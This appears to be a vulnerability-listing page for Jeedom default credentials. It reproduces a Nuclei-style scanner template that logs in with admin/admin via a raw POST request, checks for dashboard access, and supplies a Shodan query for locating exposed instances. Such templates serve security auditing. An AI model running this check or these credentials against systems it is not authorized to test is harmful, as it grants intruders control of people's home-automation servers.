漏洞描述
Jeedom default login has been detected.
jeedom-default-login: Jeedom - Default Login
PoC代码[已公开]
id: jeedom-default-login
info:
name: Jeedom - Default Login
author: ritikchaddha
severity: high
description: |
Jeedom default login has been detected.
classification:
cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: jeedom
product: jeedom
shodan-query: title:"Jeedom"
tags: jeedom,default-login,misconfig,vuln
variables:
username: admin
password: admin
http:
- raw:
- |
POST /core/ajax/user.ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=login&username={{username}}&password={{password}}&twoFactorCode=&storeConnection=0
- |
GET /index.php?v=d&p=dashboard HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- 'state":"ok'
- 'result":'
condition: and
- type: word
part: body_2
words:
- "logout=1"
- "Plugins</span>"
condition: and
# digest: 490a0046304402203a8359ed38095b4ace04cf8f7641e7dbd20a705a125be23abefa9b313b1e637d02202bae1e4e46ae9ac51c2c882e15c2dfc665adb24edc166c1a4988819f47c24939:922c64590222798bb761d5b6d8e72950